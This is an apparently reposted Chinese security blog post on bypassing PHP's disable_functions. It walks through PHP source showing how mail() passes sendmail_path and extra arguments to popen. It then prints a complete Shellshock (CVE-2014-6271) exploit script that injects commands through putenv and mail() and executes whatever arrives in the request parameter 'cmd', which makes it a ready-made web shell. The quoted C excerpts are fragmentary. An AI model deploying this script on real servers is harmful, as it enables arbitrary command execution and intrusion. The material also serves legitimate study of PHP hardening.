PHP Execute Command Bypass Disable_functions


char *sendmail_path = INI_STR("sendmail_path"); 
char *sendmail_cmd = NULL;


; For Unix only.  You may supply arguments as well (default: "sendmail -t -i"). 
;sendmail_path =

注释中可以看到,send_mail默认值为”sendmail -t -i”. 

extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。 
if (!sendmail_path) { 
#if (defined PHP_WIN32 || defined NETWARE) 
    /* handle old style win smtp sending */ 
    if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) { 
      if (tsm_errmsg) { 
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg); 
      } else { 
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err)); 
  if (extra_cmd != NULL) { 
    spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd); 
  } else { 
    sendmail_cmd = sendmail_path; 


#ifdef PHP_WIN32 
  sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC); 
  /* Since popen() doesn‘t indicate if the internal fork() doesn‘t work 
   * (e.g. the shell can‘t be executed) we explicitly set it to 0 to be 
   * sure we don‘t catch any older errno value. */ 
  errno = 0; 
  sendmail = popen(sendmail_cmd, "w"); 



影响版本:php 各版本



# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 
# Google Dork: none 
# Date: 10/31/2014 
# Exploit Author: Ryan King (Starfall) 
# Vendor Homepage: 
# Software Link: 
# Version: 5.* (tested on 5.6.2) 
# Tested on: Debian 7 and CentOS 5 and 6 
# CVE: CVE-2014-6271

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 
   $tmp = tempnam(".","data"); 
   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 
   // In Safe Mode, the user may only alter environment variableswhose names 
   // begin with the prefixes supplied by this directive. 
   // By default, users will only be able to set environment variablesthat 
   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, 
   // PHP will let the user modify ANY environment variable! 
   mail("[email protected]","","","","-bv"); // -bv so we don‘t actuallysend any mail 
   $output = @file_get_contents($tmp); 
   if($output != "") return $output; 
   else return "No output, or not vuln."; 

echo shellshock($_REQUEST["cmd"]); 

【本文来源: 作者 phith0n】

转载请注明:安全脉搏 » PHP Execute Command Bypass Disable_functions

时间: 2025-01-06 04:19:46

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